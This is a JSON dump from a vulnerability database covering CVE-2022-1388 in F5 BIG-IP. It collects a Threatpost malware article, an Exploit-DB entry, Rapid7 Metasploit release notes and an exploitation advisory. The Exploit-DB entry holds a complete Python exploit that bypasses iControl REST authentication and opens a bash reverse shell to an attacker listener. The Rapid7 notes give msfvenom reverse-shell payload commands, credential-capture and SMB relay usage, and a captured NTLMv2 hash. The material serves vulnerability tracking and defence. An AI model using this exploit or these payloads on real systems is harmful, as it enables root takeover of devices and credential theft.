\u2013 [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388>)\n * Spring Cloud Gateway \u2013 [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)\n * TOTOLink A3000RU wireless router \u2013 [CVE-2022-25075](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25075>)\n * Kramer VIAWare \u2013 [CVE-2021-35064](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>)\n\n\u201cThis indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,\u201d the researcher explained.\n\n## **Recommended Actions **\n\nThe Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices\u2019 exposure to the internet.\n\nAnother action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T12:24:44", "type": "threatpost", "title": "EnemyBot Malware Targets Web Servers, CMS Tools and Android OS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35064", "CVE-2021-44228", "CVE-2021-45046", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-25075"], "modified": "2022-05-31T12:24:44", "id": "THREATPOST:F12423DD382283B0E48D4852237679FC", "href": "https://threatpost.com/enemybot-malware-targets-web-servers-cms-tools-and-android-os/179765/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-12T12:22:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 16.0.x - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-1388", "CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "EDB-ID:50932", "href": "https://www.exploit-db.com/exploits/50932", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)\r\n# Exploit Author: Yesith Alvarez\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x \r\n# CVE : CVE-2022-1388\r\n\r\nfrom requests import Request, Session\r\nimport sys\r\nimport json\r\n\r\n\r\n\r\ndef title():\r\n print('''\r\n \r\n _______ ________ ___ ___ ___ ___ __ ____ ___ ___ \r\n / ____\\ \\ / / ____| |__ \\ / _ \\__ \\|__ \\ /_ |___ \\ / _ \\ / _ \\ \r\n | | \\ \\ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |\r\n | | \\ \\/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < \r\n | |____ \\ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |\r\n \\_____| \\/ |______| |____|\\___/____|____| |_|____/ \\___/ \\___/ \r\n \r\n \r\n \r\nAuthor: Yesith Alvarez\r\nGithub: https://github.com/yealvarez\r\nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\r\n ''') \r\n\r\ndef exploit(url, lhost, lport):\r\n\turl = url + 'mgmt/tm/util/bash'\r\n\tdata = {\r\n\t\t\"command\":\"run\",\r\n\t\t\"utilCmdArgs\":\"-c 'bash -i >& /dev/tcp/\"+lhost+\"/\"+lport+\" 0>&1'\"\r\n\t\t\r\n\t}\r\n\theaders = {\r\n\t\t'Authorization': 'Basic YWRtaW46',\t\t\r\n\t\t'Connection':'keep-alive, X-F5-Auth-Token',\r\n\t\t'X-F5-Auth-Token': '0'\r\n\r\n\t}\r\n\ts = Session()\r\n\treq = Request('POST', url, json=data, headers=headers)\r\n\tprepped = req.prepare()\r\n\tdel prepped.headers['Content-Type']\r\n\tresp = s.send(prepped,\r\n\t verify=False,\r\n\t timeout=15\r\n\t)\r\n\t#print(prepped.headers)\r\n\t#print(url)\r\n\t#print(resp.headers)\r\n\t#print(resp.json())\r\n\tprint(resp.status_code)\r\n\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 4):\r\n \tprint('[+] USAGE: python3 %s https://<target_url> lhost lport\\n'%(sys.argv[0]))\r\n \tprint('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\\n'%(sys.argv[0]))\r\n \tprint('[+] Do not forget to run the listener: nc -lvp 4444\\n')\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1],sys.argv[2],sys.argv[3])", "sourceHref": "https://www.exploit-db.com/download/50932", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as &quot;Spring4Shell.&quot; [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : 